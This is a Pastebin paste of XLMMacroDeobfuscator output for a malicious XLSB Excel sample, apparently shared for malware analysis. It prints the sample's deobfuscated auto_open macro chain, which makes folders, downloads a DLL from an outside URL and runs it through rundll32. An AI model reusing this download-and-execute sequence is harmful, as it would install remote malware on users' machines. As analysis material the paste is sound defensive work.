API tools faq
paste
Advertisement
dissectmalware

XLSB sample - XLMDeobfuscator output

dissectmalware
Nov 29th, 2020
351
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.79 KB | None | 0 0
raw download clone embed print report
  1. C:\Users\user\AppData\Local\Programs\Python\Python36-32\python.exe C:/Users/user/Downloads/last/XLMMacroDeobfuscator_new/XLMMacroDeobfuscator/deobfuscator.py -f C:\Users\user\Downloads\tests-xlm\test2.xlsb
  2.  
  3. _ _______
  4. |\ /|( \ ( )
  5. ( \ / )| ( | () () |
  6. \ (_) / | | | || || |
  7. ) _ ( | | | |(_)| |
  8. / ( ) \ | | | | | |
  9. ( / \ )| (____/\| ) ( |
  10. |/ \|(_______/|/ \|
  11. ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
  12. ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
  13. | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
  14. | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
  15. | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
  16. | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
  17. | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
  18. (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
  19.  
  20.  
  21. XLMMacroDeobfuscator(v0.1.6) - https://github.com/DissectMalware/XLMMacroDeobfuscator
  22.  
  23. File: C:\Users\user\Downloads\tests-xlm\test2.xlsb
  24.  
  25. Unencrypted xlsb file
  26.  
  27. [Loading Cells]
  28. auto_open: auto_open->jf!$T$73
  29. [Starting Deobfuscation]
  30. CELL:T73 , FullEvaluation , $GU$614()
  31. CELL:GU614 , FullEvaluation , SET.NAME(wnzddroibxuqpv,http://liveswindow.casa/opzi0n1.dll)
  32. CELL:GU615 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$BB$54)
  33. CELL:GU616 , FullEvaluation , $AU$259()
  34. CELL:AU259 , FullEvaluation , FORMULA(http://liveswindow.casa/opzi0n1.dll,$BB$54)
  35. CELL:GU617 , FullEvaluation , RUN(jf!BV2537)
  36. CELL:BV2537 , FullEvaluation , SET.NAME(wnzddroibxuqpv,C:\DlkYKlI\UiQhTXx\sncwner.dll,DllRegisterServer)
  37. CELL:BV2538 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$R$1071)
  38. CELL:BV2539 , FullEvaluation , $AU$259()
  39. CELL:AU259 , FullEvaluation , FORMULA(C:\DlkYKlI\UiQhTXx\sncwner.dll,DllRegisterServer,$R$1071)
  40. CELL:BV2540 , FullEvaluation , RUN(jf!EB1002)
  41. CELL:EB1002 , FullEvaluation , SET.NAME(wnzddroibxuqpv,C:\DlkYKlI\UiQhTXx\sncwner.dll)
  42. CELL:EB1003 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$H$2491)
  43. CELL:EB1004 , FullEvaluation , $AU$259()
  44. CELL:AU259 , FullEvaluation , FORMULA(C:\DlkYKlI\UiQhTXx\sncwner.dll,$H$2491)
  45. CELL:EB1005 , FullEvaluation , RUN(jf!FH2455)
  46. CELL:FH2455 , FullEvaluation , SET.NAME(wnzddroibxuqpv,URLMON)
  47. CELL:FH2456 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$IE$1801)
  48. CELL:FH2457 , FullEvaluation , $AU$259()
  49. CELL:AU259 , FullEvaluation , FORMULA(URLMON,$IE$1801)
  50. CELL:FH2458 , FullEvaluation , RUN(jf!EN2907)
  51. CELL:EN2907 , FullEvaluation , SET.NAME(wnzddroibxuqpv,URLDownloadToFileA)
  52. CELL:EN2908 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$FM$1658)
  53. CELL:EN2909 , FullEvaluation , $AU$259()
  54. CELL:AU259 , FullEvaluation , FORMULA(URLDownloadToFileA,$FM$1658)
  55. CELL:EN2910 , FullEvaluation , RUN(jf!FM695)
  56. CELL:FM695 , FullEvaluation , SET.NAME(wnzddroibxuqpv,JJCCJJ)
  57. CELL:FM696 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$HN$989)
  58. CELL:FM697 , FullEvaluation , $AU$259()
  59. CELL:AU259 , FullEvaluation , FORMULA(JJCCJJ,$HN$989)
  60. CELL:FM698 , FullEvaluation , RUN(jf!BH797)
  61. CELL:BH797 , FullEvaluation , SET.NAME(wnzddroibxuqpv,Shell32)
  62. CELL:BH798 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$GW$1910)
  63. CELL:BH799 , FullEvaluation , $AU$259()
  64. CELL:AU259 , FullEvaluation , FORMULA(Shell32,$GW$1910)
  65. CELL:BH800 , FullEvaluation , RUN(jf!ED1009)
  66. CELL:ED1009 , FullEvaluation , SET.NAME(wnzddroibxuqpv,ShellExecuteA)
  67. CELL:ED1010 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$DL$2966)
  68. CELL:ED1011 , FullEvaluation , $AU$259()
  69. CELL:AU259 , FullEvaluation , FORMULA(ShellExecuteA,$DL$2966)
  70. CELL:ED1012 , FullEvaluation , RUN(jf!IC1996)
  71. CELL:IC1996 , FullEvaluation , SET.NAME(wnzddroibxuqpv,JJCCCCJ)
  72. CELL:IC1997 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$CS$251)
  73. CELL:IC1998 , FullEvaluation , $AU$259()
  74. CELL:AU259 , FullEvaluation , FORMULA(JJCCCCJ,$CS$251)
  75. CELL:IC1999 , FullEvaluation , RUN(jf!GT1898)
  76. CELL:GT1898 , FullEvaluation , SET.NAME(wnzddroibxuqpv,Open)
  77. CELL:GT1899 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$HD$2170)
  78. CELL:GT1900 , FullEvaluation , $AU$259()
  79. CELL:AU259 , FullEvaluation , FORMULA(Open,$HD$2170)
  80. CELL:GT1901 , FullEvaluation , RUN(jf!T2783)
  81. CELL:T2783 , FullEvaluation , SET.NAME(wnzddroibxuqpv,regsvr32.exe)
  82. CELL:T2784 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$Z$2857)
  83. CELL:T2785 , FullEvaluation , $AU$259()
  84. CELL:AU259 , FullEvaluation , FORMULA(regsvr32.exe,$Z$2857)
  85. CELL:T2786 , FullEvaluation , RUN(jf!DD1093)
  86. CELL:DD1093 , FullEvaluation , SET.NAME(wnzddroibxuqpv,rundll32.exe)
  87. CELL:DD1094 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$FB$2223)
  88. CELL:DD1095 , FullEvaluation , $AU$259()
  89. CELL:AU259 , FullEvaluation , FORMULA(rundll32.exe,$FB$2223)
  90. CELL:DD1096 , FullEvaluation , RUN(jf!HK1793)
  91. CELL:HK1793 , FullEvaluation , SET.NAME(wnzddroibxuqpv,C:\DlkYKlI)
  92. CELL:HK1794 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$IM$373)
  93. CELL:HK1795 , FullEvaluation , $AU$259()
  94. CELL:AU259 , FullEvaluation , FORMULA(C:\DlkYKlI,$IM$373)
  95. CELL:HK1796 , FullEvaluation , RUN(jf!HM2293)
  96. CELL:HM2293 , FullEvaluation , SET.NAME(wnzddroibxuqpv,C:\DlkYKlI\UiQhTXx)
  97. CELL:HM2294 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$BB$248)
  98. CELL:HM2295 , FullEvaluation , $AU$259()
  99. CELL:AU259 , FullEvaluation , FORMULA(C:\DlkYKlI\UiQhTXx,$BB$248)
  100. CELL:HM2296 , FullEvaluation , RUN(jf!GA2355)
  101. CELL:GA2355 , FullEvaluation , SET.NAME(wnzddroibxuqpv,Kernel32)
  102. CELL:GA2356 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$FR$295)
  103. CELL:GA2357 , FullEvaluation , $AU$259()
  104. CELL:AU259 , FullEvaluation , FORMULA(Kernel32,$FR$295)
  105. CELL:GA2358 , FullEvaluation , RUN(jf!GT2897)
  106. CELL:GT2897 , FullEvaluation , SET.NAME(wnzddroibxuqpv,CreateDirectoryA)
  107. CELL:GT2898 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$GL$2952)
  108. CELL:GT2899 , FullEvaluation , $AU$259()
  109. CELL:AU259 , FullEvaluation , FORMULA(CreateDirectoryA,$GL$2952)
  110. CELL:GT2900 , FullEvaluation , RUN(jf!HO2319)
  111. CELL:HO2319 , FullEvaluation , SET.NAME(wnzddroibxuqpv,JCJ)
  112. CELL:HO2320 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$EQ$7)
  113. CELL:HO2321 , FullEvaluation , $AU$259()
  114. CELL:AU259 , FullEvaluation , FORMULA(JCJ,$EQ$7)
  115. CELL:HO2322 , FullEvaluation , RUN(jf!R450)
  116. CELL:R450 , FullEvaluation , SET.NAME(wnzddroibxuqpv,INSENG)
  117. CELL:R451 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$GA$816)
  118. CELL:R452 , FullEvaluation , $AU$259()
  119. CELL:AU259 , FullEvaluation , FORMULA(INSENG,$GA$816)
  120. CELL:R453 , FullEvaluation , RUN(jf!H1261)
  121. CELL:H1261 , FullEvaluation , SET.NAME(wnzddroibxuqpv,DownloadFile)
  122. CELL:H1262 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$AQ$2363)
  123. CELL:H1263 , FullEvaluation , $AU$259()
  124. CELL:AU259 , FullEvaluation , FORMULA(DownloadFile,$AQ$2363)
  125. CELL:H1264 , FullEvaluation , RUN(jf!HT202)
  126. CELL:HT202 , FullEvaluation , SET.NAME(wnzddroibxuqpv,BCCJ)
  127. CELL:HT203 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$IG$1852)
  128. CELL:HT204 , FullEvaluation , $AU$259()
  129. CELL:AU259 , FullEvaluation , FORMULA(BCCJ,$IG$1852)
  130. CELL:HT205 , FullEvaluation , RUN(jf!CI2596)
  131. CELL:CI2596 , FullEvaluation , SET.NAME(wnzddroibxuqpv,uOIxdmml)
  132. CELL:CI2597 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$HF$2029)
  133. CELL:CI2598 , FullEvaluation , $AU$259()
  134. CELL:AU259 , FullEvaluation , FORMULA(uOIxdmml,$HF$2029)
  135. CELL:CI2599 , FullEvaluation , RUN(jf!GH2231)
  136. CELL:GH2231 , FullEvaluation , SET.NAME(wnzddroibxuqpv,ePIPtHGW)
  137. CELL:GH2232 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$EP$1509)
  138. CELL:GH2233 , FullEvaluation , $AU$259()
  139. CELL:AU259 , FullEvaluation , FORMULA(ePIPtHGW,$EP$1509)
  140. CELL:GH2234 , FullEvaluation , RUN(jf!A2105)
  141. CELL:A2105 , FullEvaluation , SET.NAME(wnzddroibxuqpv,SVNmBteM)
  142. CELL:A2106 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$CQ$2243)
  143. CELL:A2107 , FullEvaluation , $AU$259()
  144. CELL:AU259 , FullEvaluation , FORMULA(SVNmBteM,$CQ$2243)
  145. CELL:A2108 , FullEvaluation , $T$74()
  146. CELL:T74 , FullEvaluation , CALL("Kernel32","CreateDirectoryA","JCJ","C:\DlkYKlI",0)
  147. CELL:T75 , FullEvaluation , CALL("Kernel32","CreateDirectoryA","JCJ","C:\DlkYKlI\UiQhTXx",0)
  148. CELL:T77 , FullEvaluation , CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://liveswindow.casa/opzi0n1.dll","C:\DlkYKlI\UiQhTXx\sncwner.dll",0,0)
  149. CELL:T79 , FullEvaluation , IF($T$78<>0)
  150. CELL:T80 , FullEvaluation , CALL("INSENG","DownloadFile","BCCJ","http://liveswindow.casa/opzi0n1.dll","C:\DlkYKlI\UiQhTXx\sncwner.dll",1)
  151. CELL:T82 , FullEvaluation , END.IF
  152. CELL:T84 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","rundll32.exe","C:\DlkYKlI\UiQhTXx\sncwner.dll,DllRegisterServer",0,0)
  153. CELL:T87 , End , HALT()
  154.  
  155. Files:
  156.  
  157. [END of Deobfuscation]
  158. time elapsed: 1.1293022632598877
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!